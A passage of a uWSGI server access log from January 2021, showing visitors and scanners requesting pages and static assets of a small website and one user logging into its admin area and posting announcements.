generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html +[pid: 12823|app: 0|req: 1049/1378] 103.87.172.175 () {24 vars in 302 bytes} [Tue Jan 12 23:11:02 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1050/1379] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 23:43:38 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1051/1380] 83.97.20.21 () {26 vars in 277 bytes} [Wed Jan 13 00:25:25 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +invalid request block size: 12879 (max 4096)...skip +[uwsgi-http key: 212.64.67.134:8080 client_addr: 58.247.212.239 client_port: 28368] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647] +[pid: 12823|app: 0|req: 1052/1381] 45.76.144.219 () {32 vars in 381 bytes} [Wed Jan 13 01:11:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1053/1382] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 01:48:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1054/1383] 128.14.133.58 () {30 vars in 436 bytes} [Wed Jan 13 02:07:26 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1055/1384] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 02:30:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1056/1385] 83.97.20.21 () {26 vars in 277 bytes} [Wed Jan 13 03:09:39 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1057/1386] 47.97.98.208 () {22 vars in 234 bytes} [Wed Jan 13 03:51:46 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1058/1387] 125.165.105.99 () {28 vars in 411 bytes} [Wed Jan 13 04:08:53 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1059/1388] 65.60.11.210 () {30 vars in 435 bytes} [Wed Jan 13 04:25:28 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1060/1389] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 04:28:00 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1061/1390] 83.97.20.34 () {26 vars in 278 bytes} [Wed Jan 13 04:49:33 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1062/1391] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 05:08:29 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1063/1392] 219.228.146.132 () {36 vars in 681 bytes} [Wed Jan 13 05:31:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1393] 219.228.146.132 () {38 vars in 708 bytes} [Wed Jan 13 05:31:13 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1394] 219.228.146.132 () {38 vars in 712 bytes} [Wed Jan 13 05:31:13 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1395] 219.228.146.132 () {38 vars in 730 bytes} [Wed Jan 13 05:31:13 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1396] 219.228.146.132 () {38 vars in 710 bytes} [Wed Jan 13 05:31:13 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1397] 219.228.146.132 () {38 vars in 716 bytes} [Wed Jan 13 05:31:13 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1398] 219.228.146.132 () {38 vars in 691 bytes} [Wed Jan 13 05:31:13 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1399] 219.228.146.132 () {38 vars in 689 bytes} [Wed Jan 13 05:31:13 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1400] 219.228.146.132 () {38 vars in 707 bytes} [Wed Jan 13 05:31:13 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1401] 219.228.146.132 () {38 vars in 705 bytes} [Wed Jan 13 05:31:13 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1402] 219.228.146.132 () {38 vars in 697 bytes} [Wed Jan 13 05:31:14 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1403] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:31:16 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1404] 219.228.146.132 () {38 vars in 736 bytes} [Wed Jan 13 05:31:16 2021] GET /static/img/favicon.ico => generated 1150 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: 0|req: 1064/1405] 219.228.146.132 () {48 vars in 893 bytes} [Wed Jan 13 05:32:48 2021] POST / => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1065/1406] 219.228.146.132 () {40 vars in 864 bytes} [Wed Jan 13 05:32:48 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1066/1407] 219.228.146.132 () {40 vars in 866 bytes} [Wed Jan 13 05:32:48 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1408] 219.228.146.132 () {38 vars in 818 bytes} [Wed Jan 13 05:32:54 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 1067/1409] 219.228.146.132 () {40 vars in 883 bytes} [Wed Jan 13 05:32:58 2021] GET /single-an-1 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1068/1410] 219.228.146.132 () {40 vars in 885 bytes} [Wed Jan 13 05:32:58 2021] GET /single-an-1/ => generated 3045 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1069/1411] 219.228.146.132 () {40 vars in 879 bytes} [Wed Jan 13 05:33:09 2021] GET /all-0-0-0 => generated 9502 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1412] 219.228.146.132 () {38 vars in 757 bytes} [Wed Jan 13 05:33:09 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 10 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1413] 219.228.146.132 () {38 vars in 756 bytes} [Wed Jan 13 05:33:09 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 10 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1414] 219.228.146.132 () {38 vars in 831 bytes} [Wed Jan 13 05:33:09 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 23084 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1415] 219.228.146.132 () {38 vars in 855 bytes} [Wed Jan 13 05:33:09 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 1070/1416] 219.228.146.132 () {40 vars in 881 bytes} [Wed Jan 13 05:33:15 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1071/1417] 219.228.146.132 () {40 vars in 883 bytes} [Wed Jan 13 05:33:15 2021] GET /single/6/ => generated 8794 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1418] 219.228.146.132 () {38 vars in 903 bytes} [Wed Jan 13 05:33:15 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 110927 bytes in 6 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 1072/1419] 219.228.146.132 () {40 vars in 879 bytes} [Wed Jan 13 05:33:29 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1073/1420] 219.228.146.132 () {40 vars in 881 bytes} [Wed Jan 13 05:33:29 2021] GET /publish/ => generated 5083 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1074/1421] 219.228.146.132 () {38 vars in 814 bytes} [Wed Jan 13 05:39:20 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1075/1422] 219.228.146.132 () {40 vars in 872 bytes} [Wed Jan 13 05:39:26 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1076/1423] 219.228.146.132 () {40 vars in 874 bytes} [Wed Jan 13 05:39:26 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 12823|app: 0|req: 1077/1424] 219.228.146.132 () {38 vars in 767 bytes} [Wed Jan 13 05:39:26 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1078/1425] 219.228.146.132 () {48 vars in 964 bytes} [Wed Jan 13 05:39:39 2021] POST /my-admin/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1079/1426] 219.228.146.132 () {40 vars in 885 bytes} [Wed Jan 13 05:39:39 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1080/1427] 219.228.146.132 () {40 vars in 887 bytes} [Wed Jan 13 05:39:39 2021] GET /admin-home/ => generated 9586 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1428] 219.228.146.132 () {38 vars in 821 bytes} [Wed Jan 13 05:39:39 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1429] 219.228.146.132 () {38 vars in 755 bytes} [Wed Jan 13 05:39:39 2021] GET /static/css/style.css => generated 118751 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1430] 219.228.146.132 () {38 vars in 767 bytes} [Wed Jan 13 05:39:39 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1431] 219.228.146.132 () {38 vars in 784 bytes} [Wed Jan 13 05:39:39 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1432] 219.228.146.132 () {38 vars in 796 bytes} [Wed Jan 13 05:39:39 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1433] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:39:39 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1434] 219.228.146.132 () {38 vars in 760 bytes} [Wed Jan 13 05:39:39 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1435] 219.228.146.132 () {38 vars in 736 bytes} [Wed Jan 13 05:39:39 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1436] 219.228.146.132 () {38 vars in 748 bytes} [Wed Jan 13 05:39:39 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1437] 219.228.146.132 () {38 vars in 824 bytes} [Wed Jan 13 05:39:40 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1438] 219.228.146.132 () {38 vars in 746 bytes} [Wed Jan 13 05:39:41 2021] GET /static/js/custom.min.js => generated 1436 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1439] 219.228.146.132 () {38 vars in 820 bytes} [Wed Jan 13 05:39:41 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1081/1440] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1082/1441] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1083/1442] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1084/1443] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1085/1444] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1086/1445] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1087/1446] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1088/1447] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:39:42 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1089/1448] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:39:42 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1090/1449] 219.228.146.132 () {40 vars in 891 bytes} [Wed Jan 13 05:39:57 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1091/1450] 219.228.146.132 () {40 vars in 893 bytes} [Wed Jan 13 05:39:57 2021] GET /announcement/ => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1092/1451] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1093/1452] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1094/1453] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1095/1454] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1096/1455] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1097/1456] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1098/1457] 219.228.146.132 () {38 vars in 876 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1099/1458] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:39:57 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1100/1459] 219.228.146.132 () {38 vars in 766 bytes} [Wed Jan 13 05:39:57 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1101/1460] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 05:46:06 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1102/1461] 219.228.146.132 () {48 vars in 978 bytes} [Wed Jan 13 05:46:15 2021] POST /announcement/ => generated 27 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 179 bytes (3 switches on core 0) +[pid: 12823|app: 0|req: 1103/1462] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 05:46:15 2021] GET /announcement/? => generated 9103 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1104/1463] 219.228.146.132 () {40 vars in 895 bytes} [Wed Jan 13 05:46:15 2021] GET /announcement/ => generated 9103 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1105/1464] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1106/1465] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1107/1466] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1108/1467] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1109/1468] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1110/1469] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1111/1470] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1112/1471] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:46:16 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1113/1472] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:46:16 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1114/1473] 219.228.146.132 () {38 vars in 814 bytes} [Wed Jan 13 05:46:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1115/1474] 219.228.146.132 () {48 vars in 937 bytes} [Wed Jan 13 05:46:43 2021] POST / => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1116/1475] 219.228.146.132 () {40 vars in 866 bytes} [Wed Jan 13 05:46:43 2021] GET /home/ => generated 8745 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1117/1476] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 05:47:16 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1118/1477] 219.228.146.132 () {48 vars in 978 bytes} [Wed Jan 13 05:48:14 2021] POST /announcement/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (2 switches on core 1) +[pid: 12823|app: 0|req: 1119/1478] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 05:48:14 2021] GET /announcement/? => generated 9971 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1120/1479] 219.228.146.132 () {40 vars in 895 bytes} [Wed Jan 13 05:48:14 2021] GET /announcement/ => generated 9971 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1121/1480] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1122/1481] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1123/1482] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 